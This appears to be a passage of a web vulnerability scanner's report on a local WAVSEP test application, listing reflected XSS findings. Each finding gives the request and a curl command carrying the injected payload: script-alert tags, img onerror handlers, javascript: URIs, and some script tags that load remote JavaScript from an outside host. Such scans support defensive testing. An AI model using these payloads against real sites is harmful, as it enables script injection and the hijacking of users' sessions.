curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp?target=%3Cscript%3Ealert%28%27w8lj92yfdt%27%29%3C%2Fscript%3E"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case19-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-SlashPathReq-Read.jsp

XSS vulnerability found via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case19-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-SlashPathReq-Read.jsp?target=%3Cscript%3Ealert%28%27wlj3zm2q7n%27%29%3C%2Fscript%3E HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case19-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-SlashPathReq-Read.jsp?target=%3Cscript%3Ealert%28%27wlj3zm2q7n%27%29%3C%2Fscript%3E"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

XSS vulnerability found via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%3Cscript%3Ealert%28%27wsjrho63lt%27%29%3C%2Fscript%3E HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%3Cscript%3Ealert%28%27wsjrho63lt%27%29%3C%2Fscript%3E"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp

XSS vulnerability found via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=%3Cscript%3Ealert%28%27wz099uakvj%27%29%3C%2Fscript%3E HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=%3Cscript%3Ealert%28%27wz099uakvj%27%29%3C%2Fscript%3E"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case37-LFI-FileClass-FilenameContext-SlashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp

XSS vulnerability found via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case37-LFI-FileClass-FilenameContext-SlashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp?target=%3Cimg%20src%3D.%20onerror%3Dalert%28%22wk2ylesf6g%22%29%3E HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case37-LFI-FileClass-FilenameContext-SlashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp?target=%3Cimg%20src%3D.%20onerror%3Dalert%28%22wk2ylesf6g%22%29%3E"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case38-LFI-FileClass-FilenameContext-BackslashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp

XSS vulnerability found via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case38-LFI-FileClass-FilenameContext-BackslashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp?target=%3Cscript%3Ealert%28%27wp8vs8lst2%27%29%3C%2Fscript%3E HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case38-LFI-FileClass-FilenameContext-BackslashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp?target=%3Cscript%3Ealert%28%27wp8vs8lst2%27%29%3C%2Fscript%3E"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case39-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp

XSS vulnerability found via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case39-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=%3Cscript%3Ealert%28%27wdwf430wru%27%29%3C%2Fscript%3E HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case39-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=%3Cscript%3Ealert%28%27wdwf430wru%27%29%3C%2Fscript%3E"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case41-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

XSS vulnerability found via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case41-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%3Cscript%3Ealert%28%27wt48do4mqa%27%29%3C%2Fscript%3E HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case41-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%3Cscript%3Ealert%28%27wt48do4mqa%27%29%3C%2Fscript%3E"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

XSS vulnerability found via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%3Cscript%3Ealert%28%27wmx3266v29%27%29%3C%2Fscript%3E HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%3Cscript%3Ealert%28%27wmx3266v29%27%29%3C%2Fscript%3E"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case43-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

XSS vulnerability found via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case43-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%3Cscript%3Ealert%28%27w5hji3lhcf%27%29%3C%2Fscript%3E HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case43-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%3Cscript%3Ealert%28%27w5hji3lhcf%27%29%3C%2Fscript%3E"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

XSS vulnerability found via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%3Cscript%3Ealert%28%27wgd1jnelb9%27%29%3C%2Fscript%3E HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%3Cscript%3Ealert%28%27wgd1jnelb9%27%29%3C%2Fscript%3E"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case54-LFI-FileClass-FilenameContext-BackslashTraversalRemoval-OSPath-DefaultFullInput-AnyPathReq-Read.jsp

XSS vulnerability found via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case54-LFI-FileClass-FilenameContext-BackslashTraversalRemoval-OSPath-DefaultFullInput-AnyPathReq-Read.jsp?target=%3Cscript%3Ealert%28%27w9t56rqk0s%27%29%3C%2Fscript%3E HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case54-LFI-FileClass-FilenameContext-BackslashTraversalRemoval-OSPath-DefaultFullInput-AnyPathReq-Read.jsp?target=%3Cscript%3Ealert%28%27w9t56rqk0s%27%29%3C%2Fscript%3E"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp

XSS vulnerability found via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=%3Cscript%3Ealert%28%27wv7lohpdkw%27%29%3C%2Fscript%3E HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=%3Cscript%3Ealert%28%27wv7lohpdkw%27%29%3C%2Fscript%3E"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

XSS vulnerability found via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%3Cscript%3Ealert%28%27whpbkq4g9f%27%29%3C%2Fscript%3E HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%3Cscript%3Ealert%28%27whpbkq4g9f%27%29%3C%2Fscript%3E"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

XSS vulnerability found via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%3Cscript%3Ealert%28%27wvd2xjen11%27%29%3C%2Fscript%3E HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%3Cscript%3Ealert%28%27wvd2xjen11%27%29%3C%2Fscript%3E"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

XSS vulnerability found via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%3Cscript%3Ealert%28%27we7j17y4ry%27%29%3C%2Fscript%3E HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%3Cscript%3Ealert%28%27we7j17y4ry%27%29%3C%2Fscript%3E"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

XSS vulnerability found via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%3Cscript%3Ealert%28%27wwyeyqtgge%27%29%3C%2Fscript%3E HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%3Cscript%3Ealert%28%27wwyeyqtgge%27%29%3C%2Fscript%3E"

Vulnerability found in /wavsep/active/LFI/LFI-FalsePositives-GET/Case01-LFI-FalsePositive-Forward-TextHtmlValidResponse-FilenameContext-Unrestricted-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp

XSS vulnerability found via injection in the parameter target
GET /wavsep/active/LFI/LFI-FalsePositives-GET/Case01-LFI-FalsePositive-Forward-TextHtmlValidResponse-FilenameContext-Unrestricted-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp?target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwrk2lhmwp7z.js%3E%3C%2Fscript%3E HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-FalsePositives-GET/Case01-LFI-FalsePositive-Forward-TextHtmlValidResponse-FilenameContext-Unrestricted-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp?target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwrk2lhmwp7z.js%3E%3C%2Fscript%3E"

Vulnerability found in /wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp

XSS vulnerability found via injection in the parameter target
GET /wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp?target=%3Cscript%3Ealert%28%27wh5a28w49a%27%29%3C%2Fscript%3E HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp?target=%3Cscript%3Ealert%28%27wh5a28w49a%27%29%3C%2Fscript%3E"

Vulnerability found in /wavsep/active/RFI/RFI-Detection-Evaluation-GET-200Error/Case01-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultFullInput-AnyPathReq-Read.jsp

XSS vulnerability found via injection in the parameter target
GET /wavsep/active/RFI/RFI-Detection-Evaluation-GET-200Error/Case01-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultFullInput-AnyPathReq-Read.jsp?target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwiw32q3xwpz.js%3E%3C%2Fscript%3E HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-200Error/Case01-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultFullInput-AnyPathReq-Read.jsp?target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwiw32q3xwpz.js%3E%3C%2Fscript%3E"

Vulnerability found in /wavsep/active/RFI/RFI-Detection-Evaluation-GET-200Error/Case03-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultInvalidInput-AnyPathReq-Read.jsp

XSS vulnerability found via injection in the parameter target
GET /wavsep/active/RFI/RFI-Detection-Evaluation-GET-200Error/Case03-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultInvalidInput-AnyPathReq-Read.jsp?target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwqkoq45c1jz.js%3E%3C%2Fscript%3E HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-200Error/Case03-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultInvalidInput-AnyPathReq-Read.jsp?target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwqkoq45c1jz.js%3E%3C%2Fscript%3E"

Vulnerability found in /wavsep/active/RFI/RFI-Detection-Evaluation-GET-200Error/Case04-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultEmptyInput-AnyPathReq-Read.jsp

XSS vulnerability found via injection in the parameter target
GET /wavsep/active/RFI/RFI-Detection-Evaluation-GET-200Error/Case04-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultEmptyInput-AnyPathReq-Read.jsp?target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwjaf8zhf96z.js%3E%3C%2Fscript%3E HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-200Error/Case04-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultEmptyInput-AnyPathReq-Read.jsp?target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwjaf8zhf96z.js%3E%3C%2Fscript%3E"

Vulnerability found in /wavsep/active/RFI/RFI-Detection-Evaluation-GET-200Error/Case05-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultFullInput-NoProtocolReq-Read.jsp

XSS vulnerability found via injection in the parameter target
GET /wavsep/active/RFI/RFI-Detection-Evaluation-GET-200Error/Case05-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultFullInput-NoProtocolReq-Read.jsp?target=%3Cscript%3Ealert%28%27ww2ojcqu6w%27%29%3C%2Fscript%3E HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-200Error/Case05-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultFullInput-NoProtocolReq-Read.jsp?target=%3Cscript%3Ealert%28%27ww2ojcqu6w%27%29%3C%2Fscript%3E"

Vulnerability found in /wavsep/active/RFI/RFI-Detection-Evaluation-GET-200Error/Case06-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultInvalidInput-NoProtocolReq-Read.jsp

XSS vulnerability found via injection in the parameter target
GET /wavsep/active/RFI/RFI-Detection-Evaluation-GET-200Error/Case06-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultInvalidInput-NoProtocolReq-Read.jsp?target=%3Cscript%3Ealert%28%27wnliy3iu8p%27%29%3C%2Fscript%3E HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-200Error/Case06-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultInvalidInput-NoProtocolReq-Read.jsp?target=%3Cscript%3Ealert%28%27wnliy3iu8p%27%29%3C%2Fscript%3E"

Vulnerability found in /wavsep/active/RFI/RFI-Detection-Evaluation-GET-200Error/Case07-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultEmptyInput-NoProtocolReq-Read.jsp

XSS vulnerability found via injection in the parameter target
GET /wavsep/active/RFI/RFI-Detection-Evaluation-GET-200Error/Case07-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultEmptyInput-NoProtocolReq-Read.jsp?target=%3Cscript%3Ealert%28%27wlenp4tc97%27%29%3C%2Fscript%3E HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-200Error/Case07-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultEmptyInput-NoProtocolReq-Read.jsp?target=%3Cscript%3Ealert%28%27wlenp4tc97%27%29%3C%2Fscript%3E"

Vulnerability found in /wavsep/active/RFI/RFI-FalsePositives-GET/Case01-RFI-FalsePositive-Forward-TextHtmlValidResponse-FilenameContext-Unrestricted-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp

XSS vulnerability found via injection in the parameter target
GET /wavsep/active/RFI/RFI-FalsePositives-GET/Case01-RFI-FalsePositive-Forward-TextHtmlValidResponse-FilenameContext-Unrestricted-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp?target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwcjryynj11z.js%3E%3C%2Fscript%3E HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/RFI/RFI-FalsePositives-GET/Case01-RFI-FalsePositive-Forward-TextHtmlValidResponse-FilenameContext-Unrestricted-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp?target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwcjryynj11z.js%3E%3C%2Fscript%3E"

Vulnerability found in /wavsep/active/RFI/RFI-FalsePositives-GET/Case05-RFI-FalsePositive-UrlClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp

XSS vulnerability found via injection in the parameter target
GET /wavsep/active/RFI/RFI-FalsePositives-GET/Case05-RFI-FalsePositive-UrlClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp?target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwjqjs5luc2z.js%3E%3C%2Fscript%3E HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/RFI/RFI-FalsePositives-GET/Case05-RFI-FalsePositive-UrlClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp?target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwjqjs5luc2z.js%3E%3C%2Fscript%3E"

Vulnerability found in /wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-GET-Experimental/Case01-Tag2HtmlPageScope-StripScriptTag.jsp

XSS vulnerability found via injection in the parameter userinput
GET /wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-GET-Experimental/Case01-Tag2HtmlPageScope-StripScriptTag.jsp?userinput=%3Cimg%20src%3D.%20onerror%3Dalert%28%22ws12rzjbr5%22%29%3E HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-GET-Experimental/Case01-Tag2HtmlPageScope-StripScriptTag.jsp?userinput=%3Cimg%20src%3D.%20onerror%3Dalert%28%22ws12rzjbr5%22%29%3E"

Vulnerability found in /wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-GET-Experimental/Case07-ScriptlessInjectionInScriptTagSrcAttribute.jsp

XSS vulnerability found via injection in the parameter userinput
GET /wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-GET-Experimental/Case07-ScriptlessInjectionInScriptTagSrcAttribute.jsp?userinput=%22%3E%3C%2Fscript%3E%3Cscript%20src%3D%2F%2Fwapiti3.ovh%2Fw3ibcqq7j3z.js%3E%3C%2Fscript%3E HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-GET-Experimental/Case07-ScriptlessInjectionInScriptTagSrcAttribute.jsp?userinput=%22%3E%3C%2Fscript%3E%3Cscript%20src%3D%2F%2Fwapiti3.ovh%2Fw3ibcqq7j3z.js%3E%3C%2Fscript%3E"

Vulnerability found in /wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-GET/Case01-Tag2HtmlPageScope.jsp

XSS vulnerability found via injection in the parameter userinput
GET /wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-GET/Case01-Tag2HtmlPageScope.jsp?userinput=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwkejj2sebgz.js%3E%3C%2Fscript%3E HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-GET/Case01-Tag2HtmlPageScope.jsp?userinput=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwkejj2sebgz.js%3E%3C%2Fscript%3E"

Vulnerability found in /wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-GET/Case02-Tag2TagScope.jsp

XSS vulnerability found via injection in the parameter userinput
GET /wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-GET/Case02-Tag2TagScope.jsp?userinput=%3C%2Ftextarea%3E%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwxwvqiddc3z.js%3E%3C%2Fscript%3E HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-GET/Case02-Tag2TagScope.jsp?userinput=%3C%2Ftextarea%3E%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwxwvqiddc3z.js%3E%3C%2Fscript%3E"

Vulnerability found in /wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-GET/Case03-Tag2TagStructure.jsp

XSS vulnerability found via injection in the parameter userinput
GET /wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-GET/Case03-Tag2TagStructure.jsp?userinput=%22%2F%3E%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwxeknck0dwz.js%3E%3C%2Fscript%3E HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-GET/Case03-Tag2TagStructure.jsp?userinput=%22%2F%3E%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwxeknck0dwz.js%3E%3C%2Fscript%3E"

Vulnerability found in /wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-GET/Case05-Tag2Frameset.jsp

XSS vulnerability found via injection in the parameter userinput
GET /wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-GET/Case05-Tag2Frameset.jsp?userinput=javascript%3AString.fromCharCode%280%2Cwxbv2o8vnt%2C1%29%3B HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-GET/Case05-Tag2Frameset.jsp?userinput=javascript%3AString.fromCharCode%280%2Cwxbv2o8vnt%2C1%29%3B"

Vulnerability found in /wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-GET/Case06-Event2TagScope.jsp

XSS vulnerability found via injection in the parameter userinput
GET /wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-GET/Case06-Event2TagScope.jsp?userinput=%22%2F%3E%3Cimg%20src%3D.%20onerror%3Dalert%28%22wjvityvovc%22%29%3E HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-GET/Case06-Event2TagScope.jsp?userinput=%22%2F%3E%3Cimg%20src%3D.%20onerror%3Dalert%28%22wjvityvovc%22%29%3E"

Vulnerability found in /wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-GET/Case07-Event2DoubleQuotePropertyScope.jsp

XSS vulnerability found via injection in the parameter userinput
GET /wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-GET/Case07-Event2DoubleQuotePropertyScope.jsp?userinput=%22%2F%3E%3Cimg%20src%3D.%20onerror%3Dalert%28%22wugxqpxulj%22%29%3E HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-GET/Case07-Event2DoubleQuotePropertyScope.jsp?userinput=%22%2F%3E%3Cimg%20src%3D.%20onerror%3Dalert%28%22wugxqpxulj%22%29%3E"

Vulnerability found in /wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-GET/Case08-Event2SingleQuotePropertyScope.jsp

XSS vulnerability found via injection in the parameter userinput
